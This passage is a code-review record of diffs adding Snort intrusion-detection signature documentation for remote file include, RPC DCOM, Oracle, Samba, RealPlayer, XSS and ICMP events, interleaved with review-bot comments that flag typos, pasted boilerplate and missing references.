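Review bot: the Summary of 100000397.txt ends with "may indicate that an exploitation attempt has been attempted", which is redundant; "may indicate an exploitation attempt" is enough. In Detailed Information the third paragraph ("This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server ...") is generic CGI boilerplate pasted after the specific remote file include text and carries the "ona" typo; either drop it or move it ahead of the "If stringent input checks are not performed" paragraph, which currently says "also" before the text it builds on. Additional References is empty for a named product ("Ovidentia"), script ("login.php") and parameter ("babInstallPath"); please cite the advisory. The two blank lines at the top of the file are also out of step with the other signature files in this patch.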
--- /dev/null
+++ b/doc/signatures/100000707.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000707
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "SmartSiteCMS" application running on a webserver. Access to the file "inc_adminfoot.php" using a remote file being passed as the "root" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "root" parameter in the "inc_adminfoot.php" script used by the "SmartSiteCMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using SmartSiteCMS
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
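Review bot: 100000707.txt is missing the blank line before the "--" separator after the Sid value, after the Affected Systems entry and after the Contributors list, unlike the other files in this patch; please add them so the file is laid out consistently. The same wording issues as the other remote file include entries apply: "has been attempted" after "exploitation attempt" is redundant, "running ona web server" in Detailed Information should be "on a", and Additional References is empty for a named product, script and parameter ("SmartSiteCMS", "inc_adminfoot.php", "root").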
--- /dev/null
+++ b/doc/signatures/3433.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3433
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
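Review bot: the Attack Scenarios section of 3433.txt ("An attacker may make a request for a file with an overly long filename via a network share") does not match the Detailed Information section, which describes malformed DCOM requests sent over RPC causing a buffer overflow; one of the two was taken from a different signature and should be corrected. Also, "Expoit code exists" in Ease of Attack should be "Exploit code exists", and Additional References is empty even though Corrective Action ("Apply the appropriate vendor supplied patches") implies a vendor bulletin that could be cited.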
--- /dev/null
+++ b/doc/signatures/2419.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+2419
+
+--
+Summary:
+This event is generated when an attempt is made to download a file that
+may be an attack vector for a known exploit to a vulnerability in Real 
+Networks RealPlayer/RealOne player.
+
+--
+Impact:
+Serious. Execution of arbitrary code.
+
+--
+Detailed Information:
+RealNetworks RealPlayer/RealOne player is a streaming media player for
+Microsoft Windows, Apple Macintosh and UNIX/Linux based operating systems.
+
+A buffer overrun condition is present in some versions of the player
+that may present a remote attacker with the opportunity to execute code
+of their choosing on a client using one of these players.
+
+--
+Affected Systems:
+	Real Networks RealOne Desktop Manager
+	Real Networks RealOne Enterprise Desktop 6.0.11 .774
+	Real Networks RealOne Player 1.0
+	Real Networks RealOne Player 2.0
+	Real Networks RealOne Player 6.0.11 .868
+	Real Networks RealOne Player version 2.0 for Windows
+	Real Networks RealPlayer 8.0 Win32
+	Real Networks RealPlayer 8.0 Unix
+	Real Networks RealPlayer 8.0 Mac
+	Real Networks RealPlayer 10.0 BETA
+
+--
+Attack Scenarios:
+An attacker may supply a malformed file to the client to exploit the
+issue.
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
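Review bot: in the Affected Systems list of 2419.txt the version strings "6.0.11 .774" and "6.0.11 .868" contain a stray space before the last component; please check the intended version numbers against the vendor advisory. Corrective Action ("Upgrade to the latest non-affected version of the software") lacks a terminating period and, with Additional References empty, gives the reader no way to find out which version that is; please add the reference. The "Simple. " line in Ease of Attack has trailing whitespace.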
--- /dev/null
+++ b/doc/signatures/1753.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+1753
+
+--
+Summary:
+This event is generated when an attempt is made to access the as_web.exe component associated with the askSam Web Publisher software.
+
+--
+Impact:
+Cross-site scripting.  This may allow execution of arbitrary commands on a victim host that visits the vulnerable server.
+
+--
+Detailed Information:
+
+askSam Web Publisher is a product that allows the creation and publication of documents and databases on the Internet.  A vulnerability exists in the as_web.exe or as_web4.exe component that may allow cross-site scripting because of a failure to filter script and HTML when error messages are returned.  This may allow an attacker to execute arbitrary code on the victim host that visits the vulnerable server.
+
+--
+Affected Systems:
+askSam Web Publisher 4.0
+
+
+--
+Attack Scenarios:
+An attacker can inject malicious code in vulnerable askSam input fields that use as_web.exe or as_web4.exe. The may allow execution of arbitrary code on a victim host that visits the vulnerable server.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Disable scripting language support in your browser and e-mail client software to prevent becoming a victim host.
+
+--
+Contributors:
+Original rule written by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/4670
+
+--
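Review bot: the Impact and Attack Scenarios sections of 1753.txt overstate the issue: Detailed Information describes cross-site scripting caused by unfiltered script and HTML in error messages, which yields script execution in the browser of a user who follows a crafted link, not "execution of arbitrary commands" or "arbitrary code on the victim host"; please align the wording. Also "The may allow execution" in Attack Scenarios should be "This may allow execution", there is a stray blank line after the "Detailed Information:" heading and two after the Affected Systems entry, and Corrective Action only addresses the client side (disabling scripting in the browser); nothing is said about a vendor fix for as_web.exe/as_web4.exe, so please state whether one exists.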
--- /dev/null
+++ b/doc/signatures/2222.txt
@@ -0,0 +1,54 @@
+Rule:  
+
+--
+Sid:
+2222
+
+--
+Summary:
+This event is generated when an attempt is made to access nph-exploitscanget.cgi on an internal web server. This may indicate an attempt to exploit a cross-site scripting or policy bypass vulnerability in Exploit Labs Wood's Infinity Scan EZ 3.69 or The Infinity Project Infinity CGI Exploit Scanner 3.11 Beta.
+
+--
+Impact:
+At the minimum, a bypass of scanning policies which may lead to a future compromise of the server. At the maximum, remote execution of arbitrary code on a client machine.
+
+--
+Detailed Information:
+The Exploit Labs Wood's Infinity Scan EZ 3.69 and The Infinity Project Infinity CGI Exploit Scanner 3.11 Beta Internet vulnerability scanners contain multiple vulnerabilities. One vulnerability is the bypassing of scanning policies configured by the software, which may enable an attacker to scan systems that have been configured to disallow scans. In addition, these scanners contain cross-site scripting vulnerabilities that allow an attacker to craft a URL that, when activated by a legitimate user, executes malicious code on the user's computer with the security context of the server that is hosting the scanner software.
+
+--
+Affected Systems:
+Any system running Exploit Labs Wood's Infinity Scan EZ 3.69 or The Infinity Project Infinity CGI Exploit Scanner 3.11 Beta, or any user who activates a specially-crafted hyperlink to the system.
+
+--
+Attack Scenarios:
+An attacker crafts a hyperlink to a server running vulnerable scanner software that contains malicious code. When an unsuspecting user activates the hyperlink, arbitrary code may be run on the user's computer with the security context of the scanner server.
+
+--
+Ease of Attack:
+Simple. An exploit exists for the cross-site scripting vulnerability; no exploit is required for the policy bypass vulnerability.
+
+--
+False Positives:
+If a legitimate remote user accesses nph-exploitscanget.cgi, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+It is not known if these vulnerabilities have been patched or fixed in later versions. Contact the vendor for more information.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+-- 
+Additional References:
+
+--
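Review bot: the Detailed Information and Attack Scenarios sections of 2222.txt describe the cross-site scripting issue inconsistently: the code "executes on the user's computer" yet "with the security context of the server that is hosting the scanner software". A cross-site scripting payload runs in the user's browser within the web origin of the vulnerable server, so the security-context wording should be rewritten to say that. Additional References is empty even though two products and versions are named (Exploit Labs Wood's Infinity Scan EZ 3.69 and The Infinity Project Infinity CGI Exploit Scanner 3.11 Beta) and Ease of Attack says an exploit exists; please cite the advisory. Trailing whitespace on the "Rule:  " line and on the "-- " separator before Additional References should be removed.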
--- /dev/null
+++ b/doc/signatures/1959.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+1959
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) nfsd is listening.
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port nfsd is using.  Attackers can also learn what versions of the nfsd protocol are accepted by nfsd. 
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as nfsd run.  The nfsd RPC service starts the Network File System (NFS) server daemon that handles file system requests from clients. Once a client mounts an NFS file system, the nfsd daemon handles access to the mount point and associated directories.  Several vulnerabilities are associated with nfsd.
+
+--
+Affected Systems:
+All hosts running the UNIX portmapper.
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where nfsd runs.  This may be a precursor to accessing nfsd.
+
+--
+Ease of Attack:
+Easy.  
+
+--
+False Positives:
+If a legitimate remote user is allowed to access nfsd, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for nfsd, not probes of the nfsd service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the nfsd service itself. An attacker may attempt to go directly to the nfsd port without querying the portmapper service, which would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
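Review bot: the Detailed Information of 1959.txt ends with "Several vulnerabilities are associated with nfsd." without saying which, and Additional References is empty; either cite the nfsd advisories or drop the sentence. In Impact, "what versions of the nfsd protocol are accepted by nfsd" reads awkwardly and could be "which protocol versions nfsd accepts". Trailing whitespace on "Easy.  " in Ease of Attack, on the last Impact line and on the second Corrective Action line should be removed.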
--- /dev/null
+++ b/doc/signatures/2790.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2790
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure publish_flavor_definition
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
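Review bot: a line-wrap artifact in the last paragraph of Detailed Information in 2790.txt leaves the sentence-ending period on its own line ("vulnerability in the procedure publish_flavor_definition" / ". This procedure is included in" / "dbms_repcat."); please join these into one sentence. Affected Systems reads "Oracle Oracle9i", duplicating the vendor name. Several heading lines ("Rule: ", "Sid: ", "Summary: ", "-- ") carry trailing whitespace. Additional References is empty although Corrective Action refers to a vendor supplied patch; please cite the Oracle advisory.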
--- /dev/null
+++ b/doc/signatures/3020.txt
@@ -0,0 +1,67 @@
+Rule: 
+
+--
+Sid: 
+3020
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Samba implementation.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code.
+
+--
+Detailed Information:
+Samba is a file and print serving system for heterogenous networks. It
+is available for use as a service and client on UNIX/Linux systems and as
+a client for Microsoft Windows systems.
+
+Samba uses the SMB/CIFS protocols to allow communication between client
+and server. The SMB protocol contains many commands and is commonly used
+to control network devices and systems from a remote location. A
+vulnerability exists in the way the smb daemon processes commands sent by
+a client system when accessing resources on the remote server.The problem
+exists in the allocation of memory which can be exploited by an attacker
+to cause an integer overflow, possibly leading to the execution of
+arbitrary code on the affected system with the privileges of the user
+running the smbd process.
+
+--
+Affected Systems:
+	Samba 3.0.8 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to supply specially crafted data to the smb daemon to
+overflow a buffer containing the information for the access control lists
+to be applied to files in the smb query.
+
+-- 
+Ease of Attack: 
+Difficult.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
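Review bot: typos in Detailed Information of 3020.txt: "heterogenous" should be "heterogeneous", and "remote server.The problem" is missing the space after the period. Detailed Information calls the flaw an integer overflow in memory allocation while Attack Scenarios describes overflowing a buffer holding access control list information; if the integer overflow in the allocation is what leads to the buffer overflow, say so explicitly so the two sections agree. Additional References is empty; since Affected Systems names "Samba 3.0.8 and prior", please cite the Samba advisory. Heading lines such as "Rule: " and "Sid: " carry trailing whitespace.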
--- /dev/null
+++ b/doc/signatures/2785.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2785
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure execute_ddl
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
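Review bot: same defects as 2790.txt: the period after "execute_ddl" sits on its own line ("vulnerability in the procedure execute_ddl" / ". This procedure is included in" / "dbms_repcat."), Affected Systems reads "Oracle Oracle9i", heading lines carry trailing whitespace, and Additional References is empty. Since 2785.txt and 2790.txt differ only in the procedure name, consider fixing the shared template once and regenerating both files.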
--- /dev/null
+++ b/doc/signatures/441.txt
@@ -0,0 +1,66 @@
+Rule:
+
+--
+
+Sid:
+441
+
+--
+
+Summary:
+This event is generated when an ICMP Router Advertisement message is found on the network.
+
+--
+
+Impact:
+
+--
+
+Detailed Information:
+Routers may use ICMP protocol 9 to advertise their information and presence on a network. Clients normally recieve this information from DNS if they use DHCP. Clients with statically assigned addresses do not need this information from an external source.
+
+It may be possible for an attacker to craft a packet of this type in such a way as to change the routing information on a DHCP enabled client.
+
+--
+
+Affected Systems:
+	Microsoft Windows 98
+	Sun Solaris 2.6, Sun OS 5.  
+
+--
+
+Attack Scenarios:
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate ICMP Address Mask Requests.
+
+--
+
+False Positives:
+Legitimate uses of ICMP type 9 messages are common.
+
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+ICMP Type 9 should be blocked at the upstream firewall.  This type of ICMP request should never originate from a host outside of the protected network.
+
+--
+
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+
+Additional References:
+None
+
+
+--
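Review bot: the Ease of Attack section of 441.txt ("Numerous tools and scripts can generate ICMP Address Mask Requests.") is copied from a different signature; this file documents ICMP Router Advertisement (type 9) messages, as the Summary and Corrective Action say. The Impact and Attack Scenarios sections are empty and should be filled in (the second paragraph of Detailed Information already describes the scenario: a crafted advertisement changing a client's routing information). In Detailed Information, "ICMP protocol 9" should be "ICMP type 9" to match the rest of the file, "recieve" should be "receive", and "receive this information from DNS if they use DHCP" appears to mean DHCP rather than DNS, since the next sentence talks about a "DHCP enabled client". The Affected Systems line "Sun Solaris 2.6, Sun OS 5.  " has trailing whitespace, and False Negatives lacks the blank line before "--" that the other sections have.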
--- /dev/null
+++ b/doc/signatures/1646.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1646
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
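Review bot: 1646.txt is the third copy of the same generic CGI text in this patch (see 1996.txt and 1608.txt), again with "running ona web server" and an empty Additional References section. Without the application name the three events are indistinguishable in the documentation; please name the affected application and cite a reference for each sid.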
--- /dev/null
+++ b/doc/signatures/2695.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2695
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure aq_table_defn_update
+. This procedure is included in
+sys.dbms_aq_import_internal.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
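Review bot: same template defects as 2785.txt and 2790.txt: the period after "aq_table_defn_update" is on its own line, Affected Systems reads "Oracle Oracle9i", heading lines carry trailing whitespace, and Additional References is empty. Note that the package here is written "sys.dbms_aq_import_internal" whereas the other two files cite "dbms_repcat" without a schema prefix; please use one convention across the Oracle entries.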
--- /dev/null
+++ b/doc/signatures/323.txt
@@ -0,0 +1,59 @@
+Rule:   
+
+--
+Sid: 323
+
+-- 
+
+Summary: 
+This is an intelligence gathering activity.
+
+-- 
+
+Impact: 
+The attacker may obtain detailed information about the administrative super user account.
+
+--
+Detailed Information:
+This event is generated when an attempt to access information about the administrative account "root" on a UNIX system is made via the finger service. 
+
+The information that can be collected includes time and source address of the last login and/or current login sessions, type of shell, path to home directory, mail forwarding address (often reflecting the name of the person administrering the system) and the time when "root" email was last read. This information can be used in planning further attacks against the host.
+
+--
+
+Attack Scenarios: 
+The attacker learns that "root" has not logged in for a long time. He hypothesizes that the system is not often used and thus not likely to be patched or secured and may therefore, be vulnerable to a number of other attacks.
+
+-- 
+
+Ease of Attack: 
+Simple, no exploit software required
+
+-- 
+
+False Positives: 
+None Known
+
+--
+False Negatives: 
+None Known
+
+-- 
+
+Corrective Action: 
+Disable the finger daemon or limit the addresses that can access the service via firewall or TCP wrappers.
+
+--
+Contributors: 
+Original rule written by Max Vision <vision@whitehats.com>
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS376
+
+--
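Review bot: 323.txt omits the Affected Systems section that every other file in this patch has; please add it (Detailed Information says the finger service on a UNIX system). The Sid value is on the same line as its heading ("Sid: 323") while the other files put it on the following line; please match the common layout. Typo "administrering" in Detailed Information should be "administering". The Summary ("This is an intelligence gathering activity.") does not say what triggers the event; the first sentence of Detailed Information (a finger request for "root") would serve better. Trailing whitespace on "Rule:   " and on several "-- " separators should be removed.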
--- /dev/null
+++ b/doc/signatures/425.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+
+Sid:
+425
+
+--
+
+Summary:
+This event is generated when a router generates and ICMP Parameter Problem Bad Length datagram.
+
+--
+
+Impact:
+This could be an indication of a protocol error by a previous hop router.  Normally this datagram would only be generated with the datagram was truncated before it reached its final destination.
+
+--
+
+Detailed Information:
+A router generates a Parameter Problem message for any error not specifically covered by another ICMP message.  An ICMP Parameter Problem Bad Length datagram indicates that the datagram was truncated before it reached its final destination.  This could be an indication of routing problems on the network, or malfunctioning routing hardware.
+
+--
+
+Attack Scenarios:
+None known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+
+--
+
+Corrective Action:
+ICMP Type 12 Code 2 datagrams are not normal network activity.  Hosts generating these types of datagrams should be investigated for configuration errors or nefarious activity.
+
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
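Review bot: grammar errors in Summary and Impact change the sense: "generates and ICMP Parameter Problem Bad Length datagram" should read "generates an ICMP Parameter Problem Bad Length datagram", and "only be generated with the datagram was truncated" should read "only be generated when the datagram was truncated". The fields also contradict each other: Attack Scenarios says "None known", yet Ease of Attack says numerous tools can forge this datagram and Corrective Action says senders should be investigated for "nefarious activity"; either describe the scenario (forged Type 12 Code 2 messages used to probe how a target stack reacts to ICMP errors) or make the three fields agree. Additional References is "None"; at minimum cite RFC 792 and the IANA ICMP parameters registry, which lists Type 12 Code 2 as Bad Length.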
--- /dev/null
+++ b/doc/signatures/100000439.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000439
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Claroline" application running on a webserver. Access to the file "postnuke.inc.php" using a remote file being passed as the "includepath" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "includepath" parameter in the "postnuke.inc.php" script used by the "Claroline" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Claroline
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
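Review bot: the third Detailed Information paragraph is the generic CGI credential-check boilerplate ("Some applications do not perform stringent checks when validating the credentials of a client host") and does not describe a remote file include; this event fires on a URL supplied in "includepath", not on any credential check, so that paragraph and the matching Attack Scenarios sentence about supplying credentials should be dropped. Corrective Action should add the control that actually stops this bug class on PHP: set allow_url_include=Off (and, where the application permits, allow_url_fopen=Off) in php.ini so include() cannot fetch a remote URL even on an unpatched Claroline. Typo "ona" ("running ona web server") in the same paragraph; Additional References is empty.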
--- /dev/null
+++ b/doc/signatures/100000337.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000337
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "phpMyDirectory" application running on a webserver. Access to the file "defaults_setup.php" using a remote file being passed as the "ROOT_PATH" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "ROOT_PATH" parameter in the "defaults_setup.php" script used by the "phpMyDirectory" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
